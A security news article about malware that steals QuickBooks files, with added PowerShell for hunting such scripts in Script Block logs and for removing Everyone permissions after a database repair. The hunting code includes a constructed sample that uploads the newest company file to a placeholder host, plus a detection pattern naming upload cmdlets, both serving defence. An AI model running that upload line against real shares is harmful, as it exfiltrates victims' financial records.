Cybercriminals are ready for tax season with new malware designed to exfiltrate Quickbooks data and post it on the internet, according to a new report from ThreatLocker.
Attackers use email to deliver the malware, which ThreatLocker CEO Danny Jenkins told Threatpost is a simple, 15-line piece of code. They used two specific methods to get it to targets: the first sends a PowerShell command that exfiltrates the data; the second uses a Word document to deliver a link or a macro that retrieves a file.
After that, the stolen files are sent to the internet, where they’re up for grabs.
“Once the executable or PowerShell command is running, it retrieves your most recently saved Quickbooks’ file location, points to your file share or local file, and proceeds to upload your file to the internet,” the report said.
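The behaviour described above (locate the company file, upload it) is what a defender can hunt for. The following is an added example, not code from the ThreatLocker report: a small classifier for PowerShell script blocks that reference QuickBooks data files and also contain an HTTP upload primitive, run first against a constructed sample and then, if Script Block Logging is enabled, against the host's own Microsoft-Windows-PowerShell/Operational log (event ID 4104). The sample script block, the share name and the URL in it are invented for the example.

```powershell
# Added hunting example; not the report's code. Flags script blocks that touch
# QuickBooks company files and also carry an upload primitive, which is the
# combination the report describes. Requires Script Block Logging (event 4104)
# for the live part; the offline part runs anywhere.

function Test-QuickBooksExfilScript {
    param([Parameter(Mandatory)][string]$ScriptText)
    # -match is case-insensitive in PowerShell.
    # Touches QuickBooks data: company file (.QBW) or backup (.QBB) extension, product or vendor name.
    $touchesQb = $ScriptText -match '\.qb[wb]\b|quickbooks|intuit'
    # Sends data off the host: the usual PowerShell/.NET upload primitives.
    $uploads   = $ScriptText -match 'Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|WebClient|UploadFile|HttpClient|ftp://'
    return ($touchesQb -and $uploads)
}

# Constructed sample in the shape the report describes (not a real malware sample):
# pick the most recently written .QBW on a share and POST it out.
$sample = @'
$f = Get-ChildItem \\FILESRV\QuickBooks -Recurse -Filter *.QBW | Sort-Object LastWriteTime -Descending | Select-Object -First 1
Invoke-RestMethod -Uri http://example.invalid/upload -Method Post -InFile $f.FullName
'@
# Constructed benign script block: file enumeration with no upload and no QuickBooks reference.
$benign = 'Get-ChildItem C:\Users -Recurse -Filter *.pdf | Measure-Object'

Write-Output "sample flagged: $(Test-QuickBooksExfilScript $sample)"
Write-Output "benign flagged: $(Test-QuickBooksExfilScript $benign)"

# Live hunt over the local Script Block log. Silently empty if logging is off
# or the log is absent. The event Message embeds the script text, so the
# classifier is applied to it directly rather than to a property index.
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                       -MaxEvents 5000 -ErrorAction SilentlyContinue
foreach ($e in $events) {
    if (Test-QuickBooksExfilScript -ScriptText $e.Message) {
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            RecordId    = $e.RecordId
            Snippet     = $e.Message.Substring(0, [Math]::Min(200, $e.Message.Length))
        }
    }
}
```

The two regexes are deliberately broad (any QuickBooks file reference together with any upload cmdlet); on a host where the finance team legitimately scripts backups to a web endpoint, whitelist that script's path or block ID rather than loosening the pattern.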
Jump in PowerShell Access to Quickbooks
Jenkins added that ThreatLocker has seen a six- to seven-times increase in instances of PowerShell accessing QuickBooks in recent weeks. A QuickBooks default permissions setting makes things extra-easy for attackers, according to the firm.
“When Quickbooks is on a file server, you are required to use a Quickbooks Database Server Manager,” the report said. “When carrying out a repair, file permissions are reset and the ‘everyone’ group is added to the permission. As a result, access to the database is left wide open and this is a major security concern.”
Jenkins said he was able to reverse engineer the Quickbooks malware and traced Quickbooks data on the dark web. He found it to be up for sale at prices starting at 100 databases for $100, and “up to thousands of dollars” for a clean database of financial information with passwords, he explained.
Besides selling the Quickbooks data for a profit, Jenkins said that he predicts the data will also likely be stored and used to power future spear-phishing campaigns, which rely on personal information to tailor social-engineering scams for maximum effect.
Quickbooks Default Permissions
To protect tax data, ThreatLocker recommended making sure the “everyone” group is not granted permissions on the Quickbooks files; the best approach is to limit access to a single user.
“If you are using a Database Server Manager, be sure to check the permissions after running a database repair and confirm they are locked down,” the report added.
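The post-repair check the report asks for, written out as an added example (not the report's or Intuit's code): audit the NTFS ACL of the folder holding the company files for Allow entries granted to the built-in Everyone group, optionally remove them, and warn if the one account that should keep access has no entry. The default path and the example identity are assumptions; substitute the share actually used by the Database Server Manager.

```powershell
<#
  Added hardening check, not code from the ThreatLocker report. Audits the NTFS
  ACL of the QuickBooks data folder for access control entries granted to the
  built-in Everyone group (SID S-1-1-0), which the report says a Database Server
  Manager repair re-adds, and removes them when run with -Remove. Run it after
  every repair. $Path and $AllowedIdentity are assumptions for the example.
#>
param(
    [string]$Path = 'C:\QuickBooksData',   # assumed location of the company files
    [string]$AllowedIdentity = '',          # e.g. 'CONTOSO\qbuser'; warns if it has no entry
    [switch]$Remove                          # without -Remove the script only reports
)

$everyoneSid = [System.Security.Principal.SecurityIdentifier]'S-1-1-0'

function Test-IsEveryone {
    param([System.Security.Principal.IdentityReference]$Identity)
    # Compare on SID rather than display name so the check also works on
    # non-English Windows, where the group is not called "Everyone".
    try {
        $Identity.Translate([System.Security.Principal.SecurityIdentifier]) -eq $everyoneSid
    } catch {
        $false   # an orphaned, unresolvable SID is not Everyone
    }
}

function Get-EveryoneAllowEntries {
    param([System.Security.AccessControl.FileSystemSecurity]$Acl)
    # Materialise with @() so the collection is not modified while enumerated later.
    @($Acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (Test-IsEveryone $_.IdentityReference)
    })
}

$acl   = Get-Acl -LiteralPath $Path
$found = Get-EveryoneAllowEntries $acl

if ($found.Count -eq 0) {
    Write-Output "OK: no Everyone allow entries on $Path"
} else {
    foreach ($ace in $found) {
        Write-Output ("FOUND: Everyone -> {0} (inherited: {1})" -f $ace.FileSystemRights, $ace.IsInherited)
    }
    if ($Remove) {
        # An inherited ACE cannot be removed from a child object. Convert the
        # inherited entries to explicit ones first, then drop Everyone and write back.
        $acl.SetAccessRuleProtection($true, $true)
        foreach ($ace in (Get-EveryoneAllowEntries $acl)) { [void]$acl.RemoveAccessRule($ace) }
        Set-Acl -LiteralPath $Path -AclObject $acl
        Write-Output "Removed Everyone allow entries from $Path"
    }
}

if ($AllowedIdentity) {
    $present = (Get-Acl -LiteralPath $Path).Access |
        Where-Object { $_.IdentityReference.Value -eq $AllowedIdentity }
    if (-not $present) {
        Write-Warning "$AllowedIdentity has no entry on $Path; grant it before users rely on the share."
    }
}

# Inventory what the folder exposes, so the audit also records what was at risk.
Get-ChildItem -LiteralPath $Path -Recurse -Filter '*.QBW' -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime
```

Run it once without -Remove to see what the repair left behind, then with -Remove as an account that owns the folder. Because the script breaks inheritance when it removes entries, check that the identities you actually need are still present afterwards, which is what the -AllowedIdentity warning is for. The share-level permissions on the SMB share itself are separate from these NTFS entries and must be checked the same way.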
Jenkins said his company looks at broad trends in the data ThreatLocker's products encounter across a variety of networks, and that he suspects Quickbooks attacks are more visible because it is one of the most-used accounting packages during tax season. Other, similar software is also likely vulnerable to this type of malware, he said.
Jenkins told Threatpost that once attackers have a person’s data, they can use it whenever, wherever and however many times they want, amounting to what can feel like “seven years of bad luck” following a breach. He added that when this kind of sensitive tax data is exfiltrated without alerting victims, coupled with the potential long-term fallout, it makes these types of attacks a “worst-case scenario.”